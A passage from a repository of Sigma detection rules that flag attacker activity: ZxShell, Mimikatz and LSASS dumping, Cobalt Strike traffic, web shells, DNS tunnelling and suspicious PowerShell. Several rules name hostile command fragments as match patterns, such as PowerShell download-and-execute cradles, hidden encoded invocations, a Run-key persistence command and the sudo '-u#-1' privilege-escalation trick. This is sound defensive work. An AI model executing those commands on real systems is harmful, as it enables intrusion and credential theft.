11 | - attack.t1050
12 | logsource:
13 | product: windows
14 | service: system
15 | detection:
16 | selection:
17 | EventID: 7045
18 | ServiceName: 'WerFaultSvc'
19 | condition: selection
20 | falsepositives:
21 | - unlikely
22 | level: critical
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_zxshell.yml:
--------------------------------------------------------------------------------
1 | title: ZxShell Malware
2 | id: f0b70adb-0075-43b0-9745-e82a1c608fcc
3 | description: Detects a ZxShell start by the called and well-known function name
4 | author: Florian Roth
5 | references:
6 | - https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100
7 | tags:
8 | - attack.g0001
9 | - attack.execution
10 | - attack.t1059
11 | - attack.defense_evasion
12 | - attack.t1085
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | Command: # NOTE(review): the sibling process_creation rules and this rule's own 'fields' list use 'CommandLine'; 'Command' looks like a typo that would leave the selection matching nothing — confirm against the backend field mapping
19 | - 'rundll32.exe *,zxFunction*'
20 | - 'rundll32.exe *,RemoteDiskXXXXX'
21 | condition: selection
22 | fields:
23 | - CommandLine
24 | - ParentCommandLine
25 | falsepositives:
26 | - Unlikely
27 | level: critical
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/av_password_dumper.yml:
--------------------------------------------------------------------------------
1 | title: Antivirus Password Dumper Detection
2 | id: 78cc2dd2-7d20-4d32-93ff-057084c38b93
3 | description: Detects a highly relevant Antivirus alert that reports a password dumper
4 | date: 2018/09/09
5 | modified: 2019/10/04
6 | author: Florian Roth
7 | references:
8 | - https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/
9 | tags:
10 | - attack.credential_access
11 | - attack.t1003
12 | logsource:
13 | product: antivirus
14 | detection:
15 | selection:
16 | Signature:
17 | - "*DumpCreds*"
18 | - "*Mimikatz*"
19 | - "*PWCrack*"
20 | - "HTool/WCE"
21 | - "*PSWtool*"
22 | - "*PWDump*"
23 | - "*SecurityTool*"
24 | - "*PShlSpy*"
25 | condition: selection
26 | fields:
27 | - FileName
28 | - User
29 | falsepositives:
30 | - Unlikely
31 | level: critical
32 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/av_webshell.yml:
--------------------------------------------------------------------------------
1 | title: Antivirus Web Shell Detection
2 | id: fdf135a2-9241-4f96-a114-bb404948f736
3 | description: Detects a highly relevant Antivirus alert that reports a web shell
4 | date: 2018/09/09
5 | modified: 2019/10/04
6 | author: Florian Roth
7 | references:
8 | - https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/
9 | tags:
10 | - attack.persistence
11 | - attack.t1100
12 | logsource:
13 | product: antivirus
14 | detection:
15 | selection:
16 | Signature:
17 | - "PHP/Backdoor*"
18 | - "JSP/Backdoor*"
19 | - "ASP/Backdoor*"
20 | - "Backdoor.PHP*"
21 | - "Backdoor.JSP*"
22 | - "Backdoor.ASP*"
23 | - "*Webshell*"
24 | condition: selection
25 | fields:
26 | - FileName
27 | - User
28 | falsepositives:
29 | - Unlikely
30 | level: critical
31 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/crime_fireball.yml:
--------------------------------------------------------------------------------
1 | title: Fireball Archer Install
2 | id: 3d4aebe0-6d29-45b2-a8a4-3dfde586a26d
3 | status: experimental
4 | description: Detects Archer malware invocation via rundll32
5 | author: Florian Roth
6 | date: 2017/06/03
7 | references:
8 | - https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/
9 | - https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100
10 | tags:
11 | - attack.execution
12 | - attack.t1059
13 | - attack.defense_evasion
14 | - attack.t1085
15 | logsource:
16 | category: process_creation
17 | product: windows
18 | detection:
19 | selection:
20 | CommandLine: '*\rundll32.exe *,InstallArcherSvc'
21 | condition: selection
22 | fields:
23 | - CommandLine
24 | - ParentCommandLine
25 | falsepositives:
26 | - Unknown
27 | level: high
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/lnx_auditd_masquerading_crond.yml:
--------------------------------------------------------------------------------
1 | title: Masquerading as Linux crond process
2 | id: 9d4548fa-bba0-4e88-bd66-5d5bf516cda0
3 | status: experimental
4 | description: Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and
5 | observation. Several different variations of this technique have been observed.
6 | author: Timur Zinniatullin, oscd.community
7 | date: 2019/10/21
8 | references:
9 | - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.yaml
10 | logsource:
11 | product: linux
12 | service: auditd
13 | detection:
14 | selection: # NOTE(review): a0..a3 pin the exact argv of the referenced Atomic test; expect the rule to have low recall against variants of the same behaviour
15 | type: 'execve' # NOTE(review): lnx_auditd_user_discovery.yml matches type 'EXECVE' (upper-case); confirm which spelling the auditd field mapping expects, since a case mismatch could stop this rule from matching
16 | a0: 'cp'
17 | a1: '-i'
18 | a2: '/bin/sh'
19 | a3: '*/crond'
20 | condition: selection
21 | level: medium
22 | tags:
23 | - attack.defense_evasion
24 | - attack.t1036
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/lnx_auditd_user_discovery.yml:
--------------------------------------------------------------------------------
1 | title: System Owner or User Discovery
2 | id: 9a0d8ca0-2385-4020-b6c6-cb6153ca56f3
3 | status: experimental
4 | description: Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not
5 | the adversary fully infects the target and/or attempts specific actions.
6 | author: Timur Zinniatullin, oscd.community
7 | date: 2019/10/21
8 | references:
9 | - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.yaml
10 | logsource:
11 | product: linux
12 | service: auditd
13 | detection:
14 | selection:
15 | type: 'EXECVE'
16 | a0:
17 | - 'users'
18 | - 'w'
19 | - 'who'
20 | condition: selection
21 | falsepositives:
22 | - Admin activity
23 | level: low
24 | tags:
25 | - attack.discovery
26 | - attack.t1033
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/lnx_auditd_web_rce.yml:
--------------------------------------------------------------------------------
1 | title: Webshell Remote Command Execution
2 | id: c0d3734d-330f-4a03-aae2-65dacc6a8222
3 | status: experimental
4 | description: Detects possible command execution by a web application/web shell
5 | tags:
6 | - attack.persistence
7 | - attack.t1100
8 | references:
9 | - personal experience
10 | author: Ilyas Ochkov, Beyu Denis, oscd.community
11 | date: 2019/10/12
12 | modified: 2019/11/04
13 | logsource:
14 | product: linux
15 | service: auditd
16 | detection:
17 | selection:
18 | type: 'SYSCALL'
19 | SYSCALL: 'execve'
20 | key: 'detect_execve_www'
21 | condition: selection
22 | falsepositives:
23 | - Admin activity
24 | - Crazy web applications
25 | level: critical
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/lnx_sudo_cve_2019_14287.yml:
--------------------------------------------------------------------------------
1 | action: global
2 | title: Sudo Privilege Escalation CVE-2019-14287
3 | id: f74107df-b6c6-4e80-bf00-4170b658162b
4 | status: experimental
5 | description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287
6 | references:
7 | - https://www.openwall.com/lists/oss-security/2019/10/14/1
8 | - https://access.redhat.com/security/cve/cve-2019-14287
9 | - https://twitter.com/matthieugarin/status/1183970598210412546
10 | author: Florian Roth
11 | date: 2019/10/15
12 | modified: 2019/10/20
13 | tags:
14 | - attack.privilege_escalation
15 | - attack.t1068
16 | - attack.t1169
17 | logsource:
18 | product: linux
19 | falsepositives:
20 | - Unlikely
21 | level: critical
22 | ---
23 | detection:
24 | selection_keywords:
25 | - '* -u#*'
26 | condition: selection_keywords
27 | ---
28 | detection:
29 | selection_user:
30 | USER:
31 | - '#-*'
32 | - '#*4294967295'
33 | condition: selection_user
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/net_dns_c2_detection.yml:
--------------------------------------------------------------------------------
1 | title: Possible DNS Tunneling
2 | id: 1ec4b281-aa65-46a2-bdae-5fd830ed914e
3 | status: experimental
4 | description: Normally, DNS logs contain a limited number of distinct DNS queries for a single domain. This rule detects a high number of queries for a single domain,
5 | which can be an indicator that DNS is being used to transfer data.
6 | references:
7 | - https://zeltser.com/c2-dns-tunneling/
8 | - https://patrick-bareiss.com/detect-c2-traffic-over-dns-using-sigma/
9 | author: Patrick Bareiss
10 | date: 2019/04/07
11 | logsource:
12 | product: dns
13 | detection:
14 | selection:
15 | parent_domain: '*'
16 | condition: selection | count(dns_query) by parent_domain > 1000
17 | falsepositives:
18 | - Legitimate software that uses DNS to transfer data
19 | level: high
20 | tags:
21 | - attack.t1043
22 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/net_susp_dns_txt_exec_strings.yml:
--------------------------------------------------------------------------------
1 | title: DNS TXT Answer with possible execution strings
2 | id: 8ae51330-899c-4641-8125-e39f2e07da72
3 | status: experimental
4 | description: Detects strings used in command execution in DNS TXT Answer
5 | references:
6 | - https://twitter.com/stvemillertime/status/1024707932447854592
7 | - https://github.com/samratashok/nishang/blob/master/Backdoors/DNS_TXT_Pwnage.ps1
8 | tags:
9 | - attack.t1071
10 | author: Markus Neis
11 | date: 2018/08/08
12 | logsource:
13 | category: dns
14 | detection:
15 | selection:
16 | record_type: 'TXT'
17 | answer:
18 | - '*IEX*'
19 | - '*Invoke-Expression*'
20 | - '*cmd.exe*'
21 | condition: selection
22 | falsepositives:
23 | - Unknown
24 | level: high
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/powershell_data_compressed.yml:
--------------------------------------------------------------------------------
1 | title: Data Compressed
2 | id: 6dc5d284-69ea-42cf-9311-fb1c3932a69a
3 | status: experimental
4 | description: An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount
5 | of data sent over the network
6 | author: Timur Zinniatullin, oscd.community
7 | date: 2019/10/21
8 | modified: 2019/11/04
9 | references:
10 | - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1002/T1002.yaml
11 | logsource:
12 | product: windows
13 | service: powershell
14 | description: 'Script block logging must be enabled'  # NOTE(review): sibling rules in this set carry the logsource free-text under the key "definition:"; confirm this key is intended
15 | detection:
16 | selection:
17 | EventID: 4104
18 | keywords|contains|all:  # all three substrings must appear in the script block; '|' alone is very common, the other two carry the signal
19 | - '-Recurse'
20 | - '|'
21 | - 'Compress-Archive'
22 | condition: selection
23 | falsepositives:
24 | - highly likely if archive ops are done via PS
25 | level: low
26 | tags:
27 | - attack.exfiltration
28 | - attack.t1002
29 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/powershell_downgrade_attack.yml:
--------------------------------------------------------------------------------
1 | title: PowerShell Downgrade Attack
2 | id: 6331d09b-4785-4c13-980f-f96661356249
3 | status: experimental
4 | description: Detects a PowerShell downgrade attack by comparing the host version with the engine version actually used (2.0)
5 | references:
6 | - http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
7 | tags:
8 | - attack.defense_evasion
9 | - attack.execution
10 | - attack.t1086
11 | author: Florian Roth (rule), Lee Holmes (idea)
12 | logsource:
13 | product: windows
14 | service: powershell-classic
15 | detection:
16 | selection:
17 | EventID: 400
18 | EngineVersion: '2.*'
19 | filter:
20 | HostVersion: '2.*'
21 | condition: selection and not filter
22 | falsepositives:
23 | - Penetration Test
24 | - Unknown
25 | level: medium
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/powershell_exe_calling_ps.yml:
--------------------------------------------------------------------------------
1 | title: PowerShell called from an Executable Version Mismatch
2 | id: c70e019b-1479-4b65-b0cc-cd0c6093a599
3 | status: experimental
4 | description: Detects PowerShell called from an executable by the version mismatch method
5 | references:
6 | - https://adsecurity.org/?p=2921
7 | tags:
8 | - attack.defense_evasion
9 | - attack.execution
10 | - attack.t1086
11 | author: Sean Metcalf (source), Florian Roth (rule)
12 | logsource:
13 | product: windows
14 | service: powershell-classic
15 | detection:
16 | selection1:
17 | EventID: 400
18 | EngineVersion:
19 | - '2.*'
20 | - '4.*'
21 | - '5.*'
22 | HostVersion: '3.*'
23 | condition: selection1
24 | falsepositives:
25 | - Penetration Tests
26 | - Unknown
27 | level: high
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/powershell_ntfs_ads_access.yml:
--------------------------------------------------------------------------------
1 | title: NTFS Alternate Data Stream
2 | id: 8c521530-5169-495d-a199-0a3a881ad24e
3 | status: experimental
4 | description: Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.
5 | references:
6 | - http://www.powertheshell.com/ntfsstreams/
7 | tags:
8 | - attack.defense_evasion
9 | - attack.t1096
10 | author: Sami Ruohonen
11 | logsource:
12 | product: windows
13 | service: powershell
14 | definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277'
15 | detection:
16 | keyword1:
17 | - "set-content"
18 | keyword2:
19 | - "-stream"
20 | condition: keyword1 and keyword2
21 | falsepositives:
22 | - unknown
23 | level: high
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/powershell_prompt_credentials.yml:
--------------------------------------------------------------------------------
1 | title: PowerShell Credential Prompt
2 | id: ca8b77a9-d499-4095-b793-5d5f330d450e
3 | status: experimental
4 | description: Detects PowerShell calling a credential prompt
5 | references:
6 | - https://twitter.com/JohnLaTwC/status/850381440629981184
7 | - https://t.co/ezOTGy1a1G
8 | tags:
9 | - attack.execution
10 | - attack.credential_access
11 | - attack.t1086
12 | author: John Lambert (idea), Florian Roth (rule)
13 | logsource:
14 | product: windows
15 | service: powershell
16 | definition: 'Script block logging must be enabled'
17 | detection:
18 | selection:
19 | EventID: 4104
20 | keyword:
21 | Message:
22 | - '*PromptForCredential*'
23 | condition: all of them
24 | falsepositives:
25 | - Unknown
26 | level: high
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/powershell_psattack.yml:
--------------------------------------------------------------------------------
1 | title: PowerShell PSAttack
2 | id: b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5
3 | status: experimental
4 | description: Detects the use of PSAttack PowerShell hack tool
5 | references:
6 | - https://adsecurity.org/?p=2921
7 | tags:
8 | - attack.execution
9 | - attack.t1086
10 | author: Sean Metcalf (source), Florian Roth (rule)
11 | logsource:
12 | product: windows
13 | service: powershell
14 | definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277'
15 | detection:
16 | selection:
17 | EventID: 4103
18 | keyword:
19 | - 'PS ATTACK!!!'
20 | condition: all of them
21 | falsepositives:
22 | - Pentesters
23 | level: high
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/powershell_shellcode_b64.yml:
--------------------------------------------------------------------------------
1 | title: PowerShell ShellCode
2 | id: 16b37b70-6fcf-4814-a092-c36bd3aafcbd
3 | status: experimental
4 | description: Detects Base64 encoded Shellcode
5 | references:
6 | - https://twitter.com/cyb3rops/status/1063072865992523776
7 | tags:
8 | - attack.privilege_escalation
9 | - attack.execution
10 | - attack.t1055
11 | - attack.t1086
12 | author: David Ledbetter (shellcode), Florian Roth (rule)
13 | date: 2018/11/17
14 | logsource:
15 | product: windows
16 | service: powershell
17 | description: 'Script block logging must be enabled'  # NOTE(review): sibling rules in this set carry the logsource free-text under the key "definition:"; confirm this key is intended
18 | detection:
19 | selection:
20 | EventID: 4104
21 | keyword1:
22 | - '*AAAAYInlM*'
23 | keyword2:  # both keyword2 variants already contain the keyword1 substring, so keyword1 adds no extra constraint
24 | - '*OiCAAAAYInlM*'
25 | - '*OiJAAAAYInlM*'
26 | condition: selection and keyword1 and keyword2
27 | falsepositives:
28 | - Unknown
29 | level: critical
30 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/powershell_suspicious_download.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious PowerShell Download
2 | id: 65531a81-a694-4e31-ae04-f8ba5bc33759
3 | status: experimental
4 | description: Detects suspicious PowerShell download command
5 | tags:
6 | - attack.execution
7 | - attack.t1086
8 | author: Florian Roth
9 | logsource:
10 | product: windows
11 | service: powershell
12 | detection:
13 | keywords:
14 | Message:
15 | - '*System.Net.WebClient).DownloadString(*'
16 | - '*system.net.webclient).downloadfile(*'
17 | condition: keywords
18 | falsepositives:
19 | - PowerShell scripts that download content from the Internet
20 | level: medium
21 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/powershell_suspicious_invocation_generic.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious PowerShell Invocations - Generic
2 | id: 3d304fda-78aa-43ed-975c-d740798a49c1
3 | status: experimental
4 | description: Detects suspicious PowerShell invocation command parameters
5 | tags:
6 | - attack.execution
7 | - attack.t1086
8 | author: Florian Roth (rule)
9 | logsource:
10 | product: windows
11 | service: powershell
12 | detection:
13 | encoded:
14 | - ' -enc '
15 | - ' -EncodedCommand '
16 | hidden:
17 | - ' -w hidden '
18 | - ' -window hidden '
19 | - ' - windowstyle hidden '  # NOTE(review): the space between "-" and "windowstyle" looks like a typo — as written this entry cannot match "-windowstyle hidden"; confirm and drop the space
20 | noninteractive:
21 | - ' -noni '
22 | - ' -noninteractive '
23 | condition: all of them  # every selection above (encoded, hidden, noninteractive) must match
24 | falsepositives:
25 | - Penetration tests
26 | - Very special / sneaky PowerShell scripts
27 | level: high
28 |
29 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/powershell_suspicious_invocation_specific.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious PowerShell Invocations - Specific
2 | id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c
3 | status: experimental
4 | description: Detects suspicious PowerShell invocation command parameters
5 | tags:
6 | - attack.execution
7 | - attack.t1086
8 | author: Florian Roth (rule)
9 | logsource:
10 | product: windows
11 | service: powershell
12 | detection:
13 | keywords:
14 | Message:
15 | - '* -nop -w hidden -c * [Convert]::FromBase64String*'
16 | - '* -w hidden -noni -nop -c "iex(New-Object*'
17 | - '* -w hidden -ep bypass -Enc*'
18 | - '*powershell.exe reg add HKCU\software\microsoft\windows\currentversion\run*'
19 | - '*bypass -noprofile -windowstyle hidden (new-object system.net.webclient).download*'
20 | - '*iex(New-Object Net.WebClient).Download*'
21 | condition: keywords
22 | falsepositives:
23 | - Penetration tests
24 | level: high
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/powershell_suspicious_keywords.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious PowerShell Keywords
2 | id: 1f49f2ab-26bc-48b3-96cc-dcffbc93eadf
3 | status: experimental
4 | description: Detects keywords that could indicate the use of some PowerShell exploitation framework
5 | date: 2019/02/11
6 | author: Florian Roth
7 | references:
8 | - https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462
9 | tags:
10 | - attack.execution
11 | - attack.t1086
12 | logsource:
13 | product: windows
14 | service: powershell
15 | definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277'
16 | detection:
17 | keywords:
18 | Message:
19 | - "*[System.Reflection.Assembly]::Load*"
20 | condition: keywords
21 | falsepositives:
22 | - Penetration tests
23 | level: high
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/proxy_cobalt_ocsp.yml:
--------------------------------------------------------------------------------
1 | title: CobaltStrike Malleable (OCSP) Profile
2 | id: 37325383-740a-403d-b1a2-b2b4ab7992e7
3 | status: experimental
4 | description: Detects Malleable (OCSP) Profile with Typo (OSCP) in URL
5 | references:
6 | - https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/ocsp.profile
7 | author: Markus Neis
8 | tags:
9 | - attack.t1102
10 | logsource:
11 | category: proxy
12 | detection:
13 | selection:
14 | c-uri: '*/oscp/*'
15 | cs-host: 'ocsp.verisign.com'
16 |
17 | condition: selection
18 | falsepositives:
19 | - Unknown
20 | level: high
21 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/proxy_cobalt_onedrive.yml:
--------------------------------------------------------------------------------
1 | title: CobaltStrike Malleable OneDrive browsing traffic profile
2 | id: c9b33401-cc6a-4cf6-83bb-57ddcb2407fc
3 | status: experimental
4 | description: Detects Malleable OneDrive Profile
5 | references:
6 | - https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/onedrive_getonly.profile
7 | author: Markus Neis
8 | tags:
9 | - attack.t1102
10 | logsource:
11 | category: proxy
12 | detection:
13 | selection:
14 | cs-method: 'GET'
15 | c-uri: '*?manifest=wac'
16 | cs-host: 'onedrive.live.com'
17 | filter:
18 | c-uri: 'http*://onedrive.live.com/*'
19 | condition: selection and not filter
20 | falsepositives:
21 | - Unknown
22 | level: high
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/proxy_raw_paste_service_access.yml:
--------------------------------------------------------------------------------
1 | title: Raw Paste Service Access
2 | id: 5468045b-4fcc-4d1a-973c-c9c9578edacb
3 | status: experimental
4 | description: Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form
5 | references:
6 | - https://www.virustotal.com/gui/domain/paste.ee/relations
7 | author: Florian Roth
8 | date: 2019/12/05
9 | tags:
10 | - attack.t1102
11 | - attack.defense_evasion
12 | logsource:
13 | category: proxy
14 | detection:
15 | selection:
16 | c-uri|contains:
17 | - '.paste.ee/r/'
18 | - '.pastebin.com/raw/'
19 | - '.hastebin.com/raw/'
20 | condition: selection
21 | fields:
22 | - ClientIP
23 | - c-uri
24 | - c-useragent
25 | falsepositives:
26 | - User activity (e.g. developer that shared and copied code snippets and used the raw link instead of just copy & paste)
27 | level: high
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_ads_executable.yml:
--------------------------------------------------------------------------------
1 | title: Executable in ADS
2 | id: b69888d4-380c-45ce-9cf9-d9ce46e67821
3 | status: experimental
4 | description: Detects the creation of an ADS data stream that contains an executable (non-empty imphash)
5 | references:
6 | - https://twitter.com/0xrawsec/status/1002478725605273600?s=21
7 | tags:
8 | - attack.defense_evasion
9 | - attack.t1027
10 | - attack.s0139
11 | author: Florian Roth, @0xrawsec
12 | date: 2018/06/03
13 | logsource:
14 | product: windows
15 | service: sysmon
16 | definition: 'Requirements: Sysmon config with Imphash logging activated'
17 | detection:
18 | selection:
19 | EventID: 15
20 | filter:
21 | Imphash: '00000000000000000000000000000000'
22 | condition: selection and not filter
23 | fields:
24 | - TargetFilename
25 | - Image
26 | falsepositives:
27 | - unknown
28 | level: critical
29 |
30 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_cactustorch.yml:
--------------------------------------------------------------------------------
1 | title: CACTUSTORCH Remote Thread Creation
2 | id: 2e4e488a-6164-4811-9ea1-f960c7359c40
3 | description: Detects remote thread creation from CACTUSTORCH as described in references.
4 | references:
5 | - https://twitter.com/SBousseaden/status/1090588499517079552
6 | - https://github.com/mdsecactivebreach/CACTUSTORCH
7 | status: experimental
8 | author: '@SBousseaden (detection), Thomas Patzke (rule)'
9 | logsource:
10 | product: windows
11 | service: sysmon
12 | detection:
13 | selection:
14 | EventID: 8
15 | SourceImage:
16 | - '*\System32\cscript.exe'
17 | - '*\System32\wscript.exe'
18 | - '*\System32\mshta.exe'
19 | - '*\winword.exe'
20 | - '*\excel.exe'
21 | TargetImage: '*\SysWOW64\\*'
22 | StartModule: null
23 | condition: selection
24 | tags:
25 | - attack.execution
26 | - attack.t1055
27 | - attack.t1064
28 | falsepositives:
29 | - unknown
30 | level: high
31 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_cobaltstrike_process_injection.yml:
--------------------------------------------------------------------------------
1 | title: CobaltStrike Process Injection
2 | id: 6309645e-122d-4c5b-bb2b-22e4f9c2fa42
3 | description: Detects a possible remote thread creation with certain characteristics which are typical for Cobalt Strike beacons
4 | references:
5 | - https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f
6 | - https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/
7 | tags:
8 | - attack.defense_evasion
9 | - attack.t1055
10 | status: experimental
11 | author: Olaf Hartong, Florian Roth, Aleksey Potapov, oscd.community
12 | date: 2018/11/30
13 | modified: 2019/11/08
14 | logsource:
15 | product: windows
16 | service: sysmon
17 | detection:
18 | selection:
19 | EventID: 8
20 | TargetProcessAddress|endswith:
21 | - '0B80'
22 | - '0C7C'
23 | - '0C88'
24 | condition: selection
25 | falsepositives:
26 | - unknown
27 | level: high
28 |
29 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_ghostpack_safetykatz.yml:
--------------------------------------------------------------------------------
1 | title: Detection of SafetyKatz
2 | id: e074832a-eada-4fd7-94a1-10642b130e16
3 | status: experimental
4 | description: Detects possible SafetyKatz Behaviour
5 | references:
6 | - https://github.com/GhostPack/SafetyKatz
7 | tags:
8 | - attack.credential_access
9 | - attack.t1003
10 | author: Markus Neis
11 | date: 2018/07/24
12 | logsource:
13 | product: windows
14 | service: sysmon
15 | detection:
16 | selection:
17 | EventID: 11
18 | TargetFilename: '*\Temp\debug.bin'
19 | condition: selection
20 | falsepositives:
21 | - Unknown
22 | level: high
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_lsass_memdump.yml:
--------------------------------------------------------------------------------
1 | title: LSASS Memory Dump
2 | id: 5ef9853e-4d0e-4a70-846f-a9ca37d876da
3 | status: experimental
4 | description: Detects an LSASS process memory dump via procdump or taskmgr, based on the CallTrace pointing to dbghelp.dll or dbgcore.dll (Windows 10)
5 | author: Samir Bousseaden
6 | references:
7 | - https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html
8 | tags:
9 | - attack.t1003
10 | - attack.s0002
11 | - attack.credential_access
12 | logsource:
13 | product: windows
14 | service: sysmon
15 | detection:
16 | selection:
17 | EventID: 10
18 | TargetImage: 'C:\windows\system32\lsass.exe'
19 | GrantedAccess: '0x1fffff'
20 | CallTrace:
21 | - '*dbghelp.dll*'
22 | - '*dbgcore.dll*'
23 | condition: selection
24 | falsepositives:
25 | - unknown
26 | level: high
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_mimikatz_trough_winrm.yml:
--------------------------------------------------------------------------------
1 | title: Mimikatz through Windows Remote Management
2 | id: aa35a627-33fb-4d04-a165-d33b4afca3e8
3 | description: Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.
4 | references:
5 | - https://pentestlab.blog/2018/05/15/lateral-movement-winrm/
6 | status: stable
7 | author: Patryk Prauze - ING Tech
8 | logsource:
9 | product: windows
10 | service: sysmon
11 | detection:
12 | selection:
13 | EventID: 10
14 | TargetImage: 'C:\windows\system32\lsass.exe'
15 | SourceImage: 'C:\Windows\system32\wsmprovhost.exe'
16 | condition: selection
17 | tags:
18 | - attack.credential_access
19 | - attack.execution
20 | - attack.t1003
21 | - attack.t1028
22 | - attack.s0005
23 | falsepositives:
24 | - low
25 | level: high
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_password_dumper_lsass.yml:
--------------------------------------------------------------------------------
1 | title: Password Dumper Remote Thread in LSASS
2 | id: f239b326-2f41-4d6b-9dfa-c846a60ef505
3 | description: Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage. The process
4 | in field Process is the malicious program. A single execution can lead to hundreds of events.
5 | references:
6 | - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm
7 | status: stable
8 | author: Thomas Patzke
9 | logsource:
10 | product: windows
11 | service: sysmon
12 | detection:
13 | selection:
14 | EventID: 8
15 | TargetImage: 'C:\Windows\System32\lsass.exe'
16 | StartModule: null
17 | condition: selection
18 | tags:
19 | - attack.credential_access
20 | - attack.t1003
21 | - attack.s0005
22 | falsepositives:
23 | - unknown
24 | level: high
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_quarkspw_filedump.yml:
--------------------------------------------------------------------------------
1 | title: QuarksPwDump Dump File
2 | id: 847def9e-924d-4e90-b7c4-5f581395a2b4
3 | status: experimental
4 | description: Detects a dump file written by QuarksPwDump password dumper
5 | references:
6 | - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm
7 | author: Florian Roth
8 | date: 2018/02/10
9 | tags:
10 | - attack.credential_access
11 | - attack.t1003
12 | level: critical
13 | logsource:
14 | product: windows
15 | service: sysmon
16 | detection:
17 | selection:
18 | # Sysmon: File Creation (ID 11)
19 | EventID: 11
20 | TargetFilename: '*\AppData\Local\Temp\SAM-*.dmp*'
21 | condition: selection
22 | falsepositives:
23 | - Unknown
24 |
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_rdp_reverse_tunnel.yml:
--------------------------------------------------------------------------------
1 | title: RDP over Reverse SSH Tunnel
2 | id: 5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4
3 | status: experimental
4 | description: Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389
5 | references:
6 | - https://twitter.com/SBousseaden/status/1096148422984384514
7 | author: Samir Bousseaden
8 | date: 2019/02/16
9 | tags:
10 | - attack.defense_evasion
11 | - attack.command_and_control
12 | - attack.t1076
13 | - car.2013-07-002
14 | logsource:
15 | product: windows
16 | service: sysmon
17 | detection:
18 | selection:
19 | EventID: 3
20 | Image: '*\svchost.exe'
21 | Initiated: 'true'
22 | SourcePort: 3389
23 | DestinationIp:
24 | - '127.*'
25 | - '::1'
26 | condition: selection
27 | falsepositives:
28 | - unknown
29 | level: high
30 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_registry_persistence_key_linking.yml:
--------------------------------------------------------------------------------
